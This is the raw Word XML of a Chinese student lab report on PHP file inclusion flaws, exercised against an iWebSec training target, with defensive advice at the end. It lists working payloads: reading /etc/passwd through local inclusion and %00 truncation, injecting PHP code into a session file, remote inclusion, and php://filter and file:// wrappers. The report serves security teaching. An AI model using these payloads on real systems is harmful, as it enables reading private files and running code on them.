        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="heading_3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>1. 核心原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>文件包含漏洞是因代码将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>用户可控参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>直接传入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>include()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>require()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等函数，未做严格过滤，导致攻击者可读取任意文件或执行恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="heading_4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>2. 漏洞类型与利用原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>无限制本地文件包含：参数无过滤，直接传入系统文件路径即可读取。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>有限制本地文件包含：代码强制拼接后缀，可通过%00空字符截断绕过后缀限制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Session 文件包含：用户输入写入 Session 文件，结合文件包含漏洞执行恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>远程文件包含：开启allow_url_fopen与allow_url_include，可包含远程恶意文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>PHP 伪协议：php://filter读源码、file://读本地文件、php://input执行代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>实验（实训）步骤</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="2" w:name="heading_6"/>
      <w:r>
        <w:t>（一）无限制文件包含漏洞（4.1，Kali 操作）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>启动 Kali 与 iWebSec 靶机，确认网络互通。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>访问漏洞页面：http://192.168.44.128/fi/01.php。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>构造 Payload 读取系统文件：http://192.168.44.128/fi/01.php?filename=/etc/passwd。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>页面成功输出/etc/passwd内容，漏洞存在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5610225" cy="2602230"/>
            <wp:effectExtent l="0" t="0" r="9525" b="7620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10225" cy="2602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bookmarkStart w:id="3" w:name="heading_7"/>
      <w:r>
        <w:t>（二）有限制本地文件包含（4.2，Windows 操作）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>访问：http://192.168.44.128/fi/02.php。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>常规访问测试：filename=test.txt，报错test.txt.html不存在，后缀限制生效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5603875" cy="3061970"/>
            <wp:effectExtent l="0" t="0" r="15875" b="5080"/>
            <wp:docPr id="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03875" cy="3061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t>%00截断绕过：http://192.168.44.128/fi/02.php?filename=/etc/passwd%00。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>成功读取/etc/passwd，绕过限制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5609590" cy="2754630"/>
            <wp:effectExtent l="0" t="0" r="10160" b="7620"/>
            <wp:docPr id="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09590" cy="2754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bookmarkStart w:id="4" w:name="heading_8"/>
      <w:r>
        <w:t>（三）Session 文件包含漏洞（4.3，Windows 操作）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>访问写入页面：http://192.168.44.128/fi/03.php。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>写入恶意代码：?iwebsec=&lt;?php phpinfo();?&gt;。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>F12 获取 PHPSESSID。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5606415" cy="2620010"/>
            <wp:effectExtent l="0" t="0" r="13335" b="8890"/>
            <wp:docPr id="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4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06415" cy="2620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t>包含 Session 文件：http://192.168.44.128/fi/01.php?filename=/var/lib/php/session/sess_你的PHPSESSID。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>成功执行phpinfo()，漏洞利用完成。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5609590" cy="3439160"/>
            <wp:effectExtent l="0" t="0" r="10160" b="8890"/>
            <wp:docPr id="7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5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09590" cy="3439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bookmarkStart w:id="5" w:name="heading_9"/>
      <w:r>
        <w:t>（四）远程文件包含（05.php）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>开启allow_url_fopen=On、allow_url_include=On并重启服务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>源码强制拼接.html，用%23截断：?filename=http://192.168.44.1/test.txt%23。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>成功包含远程文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5610860" cy="2834005"/>
            <wp:effectExtent l="0" t="0" r="8890" b="4445"/>
            <wp:docPr id="8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6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10860" cy="2834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bookmarkStart w:id="6" w:name="heading_10"/>
      <w:r>
        <w:t>（五）PHP 伪协议利用（06.php、09.php）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>php://filter读源码：?filename=php://filter/convert.base64-encode/resource=06.php。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5611495" cy="2169795"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1905"/>
            <wp:docPr id="9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7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611495" cy="2169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t>file://读本地文件：?filename=file:///etc/passwd。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5610225" cy="2678430"/>
            <wp:effectExtent l="0" t="0" r="9525" b="7620"/>
            <wp:docPr id="11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8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610225" cy="2678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spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验（实训）数据</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="DEE0E3" w:sz="0" w:space="0"/>
          <w:left w:val="single" w:color="DEE0E3" w:sz="0" w:space="0"/>
          <w:bottom w:val="single" w:color="DEE0E3" w:sz="0" w:space="0"/>
          <w:right w:val="single" w:color="DEE0E3" w:sz="0" w:space="0"/>
          <w:insideH w:val="single" w:color="DEE0E3" w:sz="0" w:space="0"/>
          <w:insideV w:val="single" w:color="DEE0E3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2760"/>
        <w:gridCol w:w="2760"/>
        <w:gridCol w:w="2760"/>
      </w:tblGrid>
      <w:tr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r>
              <w:t>实验环节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r>
              <w:t>Payload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r>
              <w:t>实验结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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r>
              <w:t>无限制 LFI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r>
              <w:t>?filename=/etc/passwd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r>
              <w:t>成功读取系统用户文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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r>
              <w:t>有限制 LFI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r>
              <w:t>?filename=/etc/passwd%00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r>
              <w:t>%00 截断绕过后缀</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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r>
              <w:t>Session 包含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r>
              <w:t>包含 sess_* 文件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r>
              <w:t>成功执行 phpinfo ()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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r>
              <w:t>php RFI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r>
              <w:t>?filename=http://x.x.x.x/test.txt%23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r>
              <w:t>成功包含远程文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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r>
              <w:t>php 伪协议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r>
              <w:t>php://filter 读源码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r>
              <w:t>获取文件 base64 编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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r>
              <w:t>php file 协议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r>
              <w:t>file:///etc/passwd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r>
              <w:t>明文读取系统文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>五、实验（实训）结论与感悟</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="7" w:name="heading_13"/>
      <w:r>
        <w:t>1. 实验结论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>（1）无限制文件包含：核心缺陷是用户参数直接传入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>include() / require()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:t>函数无过滤，可直接读取任意文件，审计重点是检查参数是否做白名单与路径限制。</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>（2）有限制 LFI：核心缺陷是仅后缀校验无过滤特殊字符，可通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>%00（空字节）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>截断绕过，审计重点是过滤../、%00并使用realpath()校验路径。</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>（3）Session 文件包含：核心缺陷是用户输入直接写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>$_SESSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t>，结合文件包含可 getshell，审计重点是过滤 Session 内容、修改存储路径。</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>（4）RFI 与伪协议：PHP 危险配置与伪协议滥用可导致代码执行，审计重点是关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>allow_url_fopen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>、限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow_url_include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:t>使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="8" w:name="heading_14"/>
      <w:r>
        <w:t>2. 实训感悟</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>通过本次实训，我完整掌握了文件包含漏洞的利用链与防御方法。漏洞的本质是用户输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>被当作代码执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:t>，开发中必须严格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>设置白名单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t>、设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> 路径限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:t>、过滤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>危险字符（../、%00、%23）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t>、关闭危险 PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> 函数（allow_url_fopen、allow_url_include）</w:t>
      </w:r>
      <w:bookmarkStart w:id="10" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t>。代码审计时需重点关注include()系列函数的参数来源，从源头避免文件包含漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="heading_15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>六、防御建议</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1.对包含文件设置白名单，仅允许指定目录与文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2.过滤../、%00、%23等危险字符，禁用路径跳转。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3.关闭allow_url_fopen与allow_url_include。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4.使用realpath()校验文件路径，避免目录穿越。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>5.Session 内容严格过滤，存储到非 Web 可访问目录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId3" w:type="default"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="2098" w:right="1474" w:bottom="1984" w:left="1587" w:header="851" w:footer="850" w:gutter="0"/>
      <w:pgNumType w:fmt="numberInDash" w:start="1"/>
      <w:cols w:space="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onsolas">
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E00006FF" w:usb1="0000FCFF" w:usb2="00000001" w:usb3="00000000" w:csb0="600001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id w:val="-1384713516"/>
                          </w:sdtPr>
                          <w:sdtContent>
                            <w:p>
                              <w:pPr>
                                <w:pStyle w:val="3"/>
                                <w:jc w:val="center"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:fldChar w:fldCharType="begin"/>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:instrText xml:space="preserve">PAGE   \* MERGEFORMAT</w:instrText>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:fldChar w:fldCharType="separate"/>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                  <w:lang w:val="zh-CN"/>
                                </w:rPr>
                                <w:t>3</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:fldChar w:fldCharType="end"/>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:p/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s0lY7tAAAAAFAQAADwAAAAAAAAABACAAAAAiAAAA&#10;ZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQHP4ZNkPAgAABwQAAA4AAAAAAAAAAQAgAAAA&#10;HwEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAKA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sdt>
                    <w:sdtPr>
                      <w:id w:val="-1384713516"/>
                    </w:sdtPr>
                    <w:sdtContent>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="3"/>
                          <w:jc w:val="center"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                          </w:rPr>
                          <w:fldChar w:fldCharType="begin"/>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                          </w:rPr>
                          <w:instrText xml:space="preserve">PAGE   \* MERGEFORMAT</w:instrText>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                          </w:rPr>
                          <w:fldChar w:fldCharType="separate"/>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:lang w:val="zh-CN"/>
                          </w:rPr>
                          <w:t>3</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                          </w:rPr>
                          <w:fldChar w:fldCharType="end"/>
                        </w:r>
                      </w:p>
                    </w:sdtContent>
                  </w:sdt>
                  <w:p/>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="3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CCDFC47"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="ACCDFC47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mUxZjhhYzVlZTc0MDdmNWRiNTI3ZWEwNmJmZTE0OTkifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00172A27"/>
    <w:rsid w:val="0001465B"/>
    <w:rsid w:val="00031CD4"/>
    <w:rsid w:val="000C3922"/>
    <w:rsid w:val="000E536A"/>
    <w:rsid w:val="00130FAD"/>
    <w:rsid w:val="00144336"/>
    <w:rsid w:val="00172A27"/>
    <w:rsid w:val="001F4376"/>
    <w:rsid w:val="00234C95"/>
    <w:rsid w:val="002A778F"/>
    <w:rsid w:val="002D406F"/>
    <w:rsid w:val="002D5E8C"/>
    <w:rsid w:val="002E1906"/>
    <w:rsid w:val="0036325A"/>
    <w:rsid w:val="003E4859"/>
    <w:rsid w:val="00464452"/>
    <w:rsid w:val="004B6F0F"/>
    <w:rsid w:val="0050477E"/>
    <w:rsid w:val="005537AB"/>
    <w:rsid w:val="00576FAB"/>
    <w:rsid w:val="006654FD"/>
    <w:rsid w:val="006859A0"/>
    <w:rsid w:val="006B656C"/>
    <w:rsid w:val="00794702"/>
    <w:rsid w:val="008072F6"/>
    <w:rsid w:val="00835DB2"/>
    <w:rsid w:val="008721FD"/>
    <w:rsid w:val="008868A3"/>
    <w:rsid w:val="008C3E7F"/>
    <w:rsid w:val="008D23D8"/>
    <w:rsid w:val="00924BE4"/>
    <w:rsid w:val="0093264C"/>
    <w:rsid w:val="009378FD"/>
    <w:rsid w:val="009546BC"/>
    <w:rsid w:val="009C3624"/>
    <w:rsid w:val="00A47DAE"/>
    <w:rsid w:val="00A70B26"/>
    <w:rsid w:val="00AF2D87"/>
    <w:rsid w:val="00AF3C0B"/>
    <w:rsid w:val="00B90EED"/>
    <w:rsid w:val="00BC4EBF"/>
